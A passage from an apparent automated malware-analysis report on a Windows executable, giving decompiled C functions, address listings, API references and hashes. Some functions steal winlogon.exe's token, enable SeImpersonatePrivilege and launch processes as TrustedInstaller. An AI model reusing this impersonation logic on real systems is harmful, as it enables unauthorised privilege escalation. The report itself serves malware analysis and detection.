							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                                                                                                  0x00401fe6
                                                                                                                                                                  0x00401ff1
                                                                                                                                                                  0x00401ff3
                                                                                                                                                                  0x00401fff
                                                                                                                                                                  0x00402002
                                                                                                                                                                  0x004020a8
                                                                                                                                                                  0x004020ab
                                                                                                                                                                  0x004020f3
                                                                                                                                                                  0x004020f6
                                                                                                                                                                  0x00402162
                                                                                                                                                                  0x00402165
                                                                                                                                                                  0x004021f2
                                                                                                                                                                  0x004021f5
                                                                                                                                                                  0x00402235
                                                                                                                                                                  0x00402238
                                                                                                                                                                  0x004022be
                                                                                                                                                                  0x0040223a
                                                                                                                                                                  0x0040223a
                                                                                                                                                                  0x00402240
                                                                                                                                                                  0x0040224b
                                                                                                                                                                  0x0040224e
                                                                                                                                                                  0x00402251
                                                                                                                                                                  0x00402254
                                                                                                                                                                  0x00402259
                                                                                                                                                                  0x0040225e
                                                                                                                                                                  0x00402262
                                                                                                                                                                  0x00402264
                                                                                                                                                                  0x00402264
                                                                                                                                                                  0x00402264
                                                                                                                                                                  0x00402262
                                                                                                                                                                  0x00402266
                                                                                                                                                                  0x0040226c
                                                                                                                                                                  0x00402271
                                                                                                                                                                  0x00402274
                                                                                                                                                                  0x00402276
                                                                                                                                                                  0x0040229a
                                                                                                                                                                  0x0040229a
                                                                                                                                                                  0x00402278
                                                                                                                                                                  0x00402296
                                                                                                                                                                  0x00402296
                                                                                                                                                                  0x0040229c
                                                                                                                                                                  0x0040229c
                                                                                                                                                                  0x004022c0
                                                                                                                                                                  0x004022c2
                                                                                                                                                                  0x004022c8
                                                                                                                                                                  0x004022c8
                                                                                                                                                                  0x004022c8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004022c0
                                                                                                                                                                  0x00402201
                                                                                                                                                                  0x00402203
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402220
                                                                                                                                                                  0x00402225
                                                                                                                                                                  0x00402227
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040222d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040222d
                                                                                                                                                                  0x00402173
                                                                                                                                                                  0x00402179
                                                                                                                                                                  0x0040217b
                                                                                                                                                                  0x0040217e
                                                                                                                                                                  0x00402183
                                                                                                                                                                  0x00402185
                                                                                                                                                                  0x00402188
                                                                                                                                                                  0x0040218d
                                                                                                                                                                  0x0040218f
                                                                                                                                                                  0x00402192
                                                                                                                                                                  0x004021a2
                                                                                                                                                                  0x004021a7
                                                                                                                                                                  0x004021a9
                                                                                                                                                                  0x004021ac
                                                                                                                                                                  0x004021cc
                                                                                                                                                                  0x004021d1
                                                                                                                                                                  0x004021d3
                                                                                                                                                                  0x004021db
                                                                                                                                                                  0x004021db
                                                                                                                                                                  0x004021e1
                                                                                                                                                                  0x004021e1
                                                                                                                                                                  0x004021e7
                                                                                                                                                                  0x004021e7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402192
                                                                                                                                                                  0x004020fe
                                                                                                                                                                  0x00402103
                                                                                                                                                                  0x00402105
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402111
                                                                                                                                                                  0x00402114
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402114
                                                                                                                                                                  0x004020ad
                                                                                                                                                                  0x004020b4
                                                                                                                                                                  0x004020b9
                                                                                                                                                                  0x004020bc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004020c2
                                                                                                                                                                  0x004020c4
                                                                                                                                                                  0x004020ce
                                                                                                                                                                  0x004020d0
                                                                                                                                                                  0x004020d3
                                                                                                                                                                  0x004020d4
                                                                                                                                                                  0x004020d5
                                                                                                                                                                  0x004020e6
                                                                                                                                                                  0x004020e7
                                                                                                                                                                  0x004020d7
                                                                                                                                                                  0x004020d7
                                                                                                                                                                  0x004020dd
                                                                                                                                                                  0x004020de
                                                                                                                                                                  0x004020df
                                                                                                                                                                  0x004020df
                                                                                                                                                                  0x004020ec
                                                                                                                                                                  0x004020ef
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004020ef
                                                                                                                                                                  0x00402008
                                                                                                                                                                  0x00402016
                                                                                                                                                                  0x0040201d
                                                                                                                                                                  0x0040202e
                                                                                                                                                                  0x00402035
                                                                                                                                                                  0x00402044
                                                                                                                                                                  0x00402049
                                                                                                                                                                  0x00402055
                                                                                                                                                                  0x00402064
                                                                                                                                                                  0x00402068
                                                                                                                                                                  0x0040206e
                                                                                                                                                                  0x0040208b
                                                                                                                                                                  0x00402070
                                                                                                                                                                  0x00402082
                                                                                                                                                                  0x00402088
                                                                                                                                                                  0x0040209e
                                                                                                                                                                  0x004020a1
                                                                                                                                                                  0x00402119
                                                                                                                                                                  0x00402119
                                                                                                                                                                  0x0040211b
                                                                                                                                                                  0x0040211e
                                                                                                                                                                  0x0040211e
                                                                                                                                                                  0x00402149
                                                                                                                                                                  0x00402151
                                                                                                                                                                  0x00402151
                                                                                                                                                                  0x00402157
                                                                                                                                                                  0x00402157
                                                                                                                                                                  0x004022cb
                                                                                                                                                                  0x004022d2
                                                                                                                                                                  0x004022d2

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040201D
                                                                                                                                                                  • memset.MSVCRT ref: 00402035
                                                                                                                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                  • wcslen.MSVCRT ref: 00402050
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040205F
                                                                                                                                                                  • wcslen.MSVCRT ref: 004020B4
                                                                                                                                                                  • _wtoi.MSVCRT ref: 004020D7
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                                                                  • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                                                                  • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                                                                    • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                                                                    • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                                                                    • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                                                                    • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                                                                    • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                                                                  • wcschr.MSVCRT ref: 00402259
                                                                                                                                                                  • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                                                                  • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                                                                  • API String ID: 3201562063-2355939583
                                                                                                                                                                  • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                                                                  • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                                                                  • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                                                                  • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                                                                                                  0x00409924
                                                                                                                                                                  0x0040992c
                                                                                                                                                                  0x00409937
                                                                                                                                                                  0x0040993f
                                                                                                                                                                  0x0040994a
                                                                                                                                                                  0x00409956
                                                                                                                                                                  0x00409962
                                                                                                                                                                  0x0040996e
                                                                                                                                                                  0x00409971
                                                                                                                                                                  0x00409973
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409976
                                                                                                                                                                  0x00409977

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll,?,00409901,751459F0,004096DF,00000000,?), ref: 00409941
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                  • API String ID: 1529661771-70141382
                                                                                                                                                                  • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                                                                  • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                                                                  • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                                                                  • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2827331108-0
                                                                                                                                                                  • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                                                                  • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                                                                  • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                  			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                                                                                                  0x00401f04
                                                                                                                                                                  0x00401f20
                                                                                                                                                                  0x00401f27
                                                                                                                                                                  0x00401f38
                                                                                                                                                                  0x00401f3f
                                                                                                                                                                  0x00401f4e
                                                                                                                                                                  0x00401f54
                                                                                                                                                                  0x00401f5f
                                                                                                                                                                  0x00401f6e
                                                                                                                                                                  0x00401f72
                                                                                                                                                                  0x00401f77
                                                                                                                                                                  0x00401f78
                                                                                                                                                                  0x00401f91
                                                                                                                                                                  0x00401f7a
                                                                                                                                                                  0x00401f88
                                                                                                                                                                  0x00401f8e
                                                                                                                                                                  0x00401f8e
                                                                                                                                                                  0x00401fa6
                                                                                                                                                                  0x00401fa9
                                                                                                                                                                  0x00401fae
                                                                                                                                                                  0x00401fb0
                                                                                                                                                                  0x00401fb2
                                                                                                                                                                  0x00401fb9
                                                                                                                                                                  0x00401fc2
                                                                                                                                                                  0x00401fca
                                                                                                                                                                  0x00401fd2
                                                                                                                                                                  0x00401fd2
                                                                                                                                                                  0x00401fd7
                                                                                                                                                                  0x00401fd7
                                                                                                                                                                  0x00401fe3

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00401F27
                                                                                                                                                                  • memset.MSVCRT ref: 00401F3F
                                                                                                                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                  • wcslen.MSVCRT ref: 00401F5A
                                                                                                                                                                  • wcslen.MSVCRT ref: 00401F69
                                                                                                                                                                  • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                                                                  • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                                                                  • API String ID: 3867304300-2177360481
                                                                                                                                                                  • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                                                                  • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                                                                  • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                                                                  • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                                                                                  0x0040955f
                                                                                                                                                                  0x00409566
                                                                                                                                                                  0x0040956e
                                                                                                                                                                  0x00409576
                                                                                                                                                                  0x00409586
                                                                                                                                                                  0x00409586
                                                                                                                                                                  0x0040956e
                                                                                                                                                                  0x00409592
                                                                                                                                                                  0x004095aa
                                                                                                                                                                  0x00409594
                                                                                                                                                                  0x004095a3
                                                                                                                                                                  0x004095a6
                                                                                                                                                                  0x004095a6

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409580
                                                                                                                                                                  • GetProcessTimes.KERNEL32(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                                                                                  • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                                                                  • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                                                                  • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
				return _t22;
			}











                                                                                                                                                                  0x00402f3a
                                                                                                                                                                  0x00402f51
                                                                                                                                                                  0x00402f60
                                                                                                                                                                  0x00402f6f
                                                                                                                                                                  0x00402f78
                                                                                                                                                                  0x00402f7a
                                                                                                                                                                  0x00402f7a
                                                                                                                                                                  0x00402f8a
                                                                                                                                                                  0x00402f8f
                                                                                                                                                                  0x00402f94
                                                                                                                                                                  0x00402f99
                                                                                                                                                                  0x00402f9e
                                                                                                                                                                  0x00402f9f
                                                                                                                                                                  0x00402fad
                                                                                                                                                                  0x00402fb2
                                                                                                                                                                  0x00402fb2
                                                                                                                                                                  0x00402fbd
                                                                                                                                                                  0x00402fc5

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00402F51
                                                                                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                  • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                                                                  • wcscat.MSVCRT ref: 00402F8A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                  • String ID: .cfg
                                                                                                                                                                  • API String ID: 776488737-3410578098
                                                                                                                                                                  • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                                                                  • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                                                                  • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                                                                  • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 35%
                                                                                                                                                                  			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                                                                                                  0x00409ddc
                                                                                                                                                                  0x00409de4
                                                                                                                                                                  0x00409df0
                                                                                                                                                                  0x00409df5
                                                                                                                                                                  0x00409df6
                                                                                                                                                                  0x00409e03
                                                                                                                                                                  0x00409e05
                                                                                                                                                                  0x00409e06
                                                                                                                                                                  0x00409e3b
                                                                                                                                                                  0x00409e5d
                                                                                                                                                                  0x00409e6a
                                                                                                                                                                  0x00409e73
                                                                                                                                                                  0x00409e75
                                                                                                                                                                  0x00409e08
                                                                                                                                                                  0x00409e08
                                                                                                                                                                  0x00409e19
                                                                                                                                                                  0x00409e37
                                                                                                                                                                  0x00409e37
                                                                                                                                                                  0x00409e81

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00409E08
                                                                                                                                                                    • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                                                                    • Part of subcall function 0040512F: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 00405184
                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                                                                  • memset.MSVCRT ref: 00409E3B
                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
